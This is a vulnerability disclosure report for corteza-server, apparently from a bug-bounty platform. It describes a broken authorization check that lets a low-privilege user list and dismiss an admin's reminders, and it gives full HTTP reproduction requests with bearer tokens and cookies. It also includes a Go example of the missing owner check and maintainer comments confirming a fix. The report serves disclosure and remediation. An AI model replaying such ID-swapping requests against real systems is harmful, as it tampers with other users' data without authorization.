Improper Privilege Management in cortezaproject/corteza-server

Valid

Reported on

Jun 13th 2021


💥 BUG

An unprivileged user can dismiss other users' reminders.

💥 IMPACT

A lower-level user can dismiss other users' reminders.

💥 STEPS TO REPRODUCE

1. First, from the admin account go to http://localhost:18080/admin/system/user and add a new user called user B.
Now give this user CRM permission so that user B can create Contacts.

2. Now, from the admin account, create a reminder and assign the admin himself to it. During creation the request below is sent to the server:

POST /api/system/reminder/ HTTP/1.1
Host: localhost:18080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Authorization: Bearer eyJhbGciOiJIUzUxMiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiIyMzQ0NzU3MzExMDU2MjQwNjciLCJleHAiOjE2MjM1MjI4NTcsInJvbGVzIjoiIiwic2NvcGUiOiJwcm9maWxlIGFwaSIsInN1YiI6IjIzNDQ4Mjc2NzY1NDU2Mzg0MyJ9.rtQSQpwMD7UVTRc97H_80xQVPpDitk6ju8Ol9SuTdcZh04IkCAgHxCpwVXam3H9l3nAn1X0KfWwtwAL_Vj5KaA
Content-Length: 99
Origin: http://localhost:18080
Connection: close
Referer: http://localhost:18080/compose/ns/service-solution/pages/234475729596461059
Cookie: SMFCookie600=a%3A4%3A%7Bi%3A0%3Bi%3A1%3Bi%3A1%3Bs%3A40%3A%22ea9158087600b4a7257e1195dc5ee8400dad5dde%22%3Bi%3A2%3Bi%3A1812683445%3Bi%3A3%3Bi%3A0%3B%7D; ElkArteCookie700=%5B1%2C%224c031ed3b44635aa46fd4f03bdfcc8ee74fb7ac1d75817cf0c156eb16bd0965e%22%2C1812706690%2C2%5D
Account: test2

{"resource":"0","assignedTo":"234476336394022915","payload":{"title":"remain11","notes":"by_user"}}


3. Now go to user B's account and send the request below to fetch the admin's reminder created above:

GET /api/system/reminder/?assignedTo=234476336394022915&limit=0 HTTP/1.1
Host: localhost:18080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzUxMiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiIyMzQ0NzU3MzExMDU2MjQwNjciLCJleHAiOjE2MjM1MjI4NTcsInJvbGVzIjoiIiwic2NvcGUiOiJwcm9maWxlIGFwaSIsInN1YiI6IjIzNDQ4Mjc2NzY1NDU2Mzg0MyJ9.rtQSQpwMD7UVTRc97H_80xQVPpDitk6ju8Ol9SuTdcZh04IkCAgHxCpwVXam3H9l3nAn1X0KfWwtwAL_Vj5KaA
Connection: close
Referer: http://localhost:18080/compose/ns/service-solution/pages/234475729596461059
Cookie: SMFCookie600=a%3A4%3A%7Bi%3A0%3Bi%3A1%3Bi%3A1%3Bs%3A40%3A%22ea9158087600b4a7257e1195dc5ee8400dad5dde%22%3Bi%3A2%3Bi%3A1812683445%3Bi%3A3%3Bi%3A0%3B%7D; ElkArteCookie700=%5B1%2C%224c031ed3b44635aa46fd4f03bdfcc8ee74fb7ac1d75817cf0c156eb16bd0965e%22%2C1812706690%2C2%5D
Account: test2

Here user B has just captured the reminder ID of the reminder the admin created above.

Now user B sends the request below to dismiss this reminder:

PATCH /api/system/reminder/235364624197758979/dismiss HTTP/1.1
Host: localhost:18080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzUxMiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiIyMzQ0NzU3MzExMDU2MjQwNjciLCJleHAiOjE2MjM1MjI4NTcsInJvbGVzIjoiIiwic2NvcGUiOiJwcm9maWxlIGFwaSIsInN1YiI6IjIzNDQ4Mjc2NzY1NDU2Mzg0MyJ9.rtQSQpwMD7UVTRc97H_80xQVPpDitk6ju8Ol9SuTdcZh04IkCAgHxCpwVXam3H9l3nAn1X0KfWwtwAL_Vj5KaA
Origin: http://localhost:18080
Connection: close
Referer: http://localhost:18080/compose/ns/service-solution/pages/234475729596461059
Cookie: SMFCookie600=a%3A4%3A%7Bi%3A0%3Bi%3A1%3Bi%3A1%3Bs%3A40%3A%22ea9158087600b4a7257e1195dc5ee8400dad5dde%22%3Bi%3A2%3Bi%3A1812683445%3Bi%3A3%3Bi%3A0%3B%7D; ElkArteCookie700=%5B1%2C%224c031ed3b44635aa46fd4f03bdfcc8ee74fb7ac1d75817cf0c156eb16bd0965e%22%2C1812706690%2C2%5D
Account: test2

Here, in this request, change the reminder ID to the reminder ID captured above.

So user B can dismiss the admin's reminder.
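The root cause the report describes is a missing object-level authorization check on the dismiss endpoint: the server authenticates the caller but never verifies that the reminder belongs to that caller. The Go example below is added here to make that fix pattern concrete; it is not corteza-server's own code. The Reminder and Identity types, the in-memory store, and the Admin flag are assumptions standing in for the real model and permission system. The reminder ID and the admin's user ID are the ones visible in the requests above; user B's ID (1002) is a constructed value.

```go
package main

import (
	"errors"
	"fmt"
)

// Reminder is a hypothetical, simplified model of a reminder record.
type Reminder struct {
	ID         uint64
	AssignedTo uint64 // user ID the reminder belongs to
	Dismissed  bool
}

// Identity is what the handler derives from the verified bearer token.
// Admin stands in for whatever system-level permission the deployment
// grants to administrators (an assumption, not Corteza's real RBAC).
type Identity struct {
	UserID uint64
	Admin  bool
}

var (
	ErrNotFound  = errors.New("reminder not found")
	ErrForbidden = errors.New("caller may not dismiss this reminder")
)

// ReminderStore is an in-memory stand-in for the database.
type ReminderStore struct {
	byID map[uint64]*Reminder
}

func NewReminderStore(rr ...Reminder) *ReminderStore {
	s := &ReminderStore{byID: make(map[uint64]*Reminder)}
	for i := range rr {
		r := rr[i]
		s.byID[r.ID] = &r
	}
	return s
}

// DismissUnchecked mirrors the behaviour described in the report: any
// authenticated caller who knows a reminder ID can dismiss it, because the
// only thing looked at is whether the ID exists.
func (s *ReminderStore) DismissUnchecked(id uint64) error {
	r, ok := s.byID[id]
	if !ok {
		return ErrNotFound
	}
	r.Dismissed = true
	return nil
}

// Dismiss is the hardened variant: before mutating state it compares the
// reminder's owner with the caller and only lets the owner (or an admin)
// through. The check happens on the loaded object, not on the request
// parameters, so a forged ID cannot bypass it.
func (s *ReminderStore) Dismiss(caller Identity, id uint64) error {
	r, ok := s.byID[id]
	if !ok {
		return ErrNotFound
	}
	if r.AssignedTo != caller.UserID && !caller.Admin {
		return ErrForbidden
	}
	r.Dismissed = true
	return nil
}

// IsDismissed reports the current state of a reminder.
func (s *ReminderStore) IsDismissed(id uint64) bool {
	r, ok := s.byID[id]
	return ok && r.Dismissed
}

func main() {
	const adminID uint64 = 234476336394022915    // from the page
	const reminderID uint64 = 235364624197758979 // from the page
	userB := Identity{UserID: 1002}             // constructed value

	vuln := NewReminderStore(Reminder{ID: reminderID, AssignedTo: adminID})
	fmt.Println("unchecked dismiss by user B:", vuln.DismissUnchecked(reminderID), "dismissed:", vuln.IsDismissed(reminderID))

	fixed := NewReminderStore(Reminder{ID: reminderID, AssignedTo: adminID})
	fmt.Println("checked dismiss by user B:", fixed.Dismiss(userB, reminderID), "dismissed:", fixed.IsDismissed(reminderID))
	fmt.Println("checked dismiss by admin:", fixed.Dismiss(Identity{UserID: adminID}, reminderID), "dismissed:", fixed.IsDismissed(reminderID))
}
```

In a real handler the distinction between ErrNotFound and ErrForbidden is a design choice: returning 404 for both hides whether a guessed ID exists, while 403 gives clearer feedback to legitimate clients. Either way the authorization decision must be made against the stored record's owner, which is exactly what the vulnerable path skips.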

Tomaž Jerman
6 months ago

Hi, thank you for the report. I was, unfortunately, unable to confirm/deny this report, but I will make one of our guys look into it asap, and resolve it if needed.

ranjit-git
3 months ago

Researcher


hello, any update?

Tomaž Jerman validated this vulnerability a month ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
Tomaž Jerman confirmed that a fix has been merged on 033447 a month ago
The fix bounty has been dropped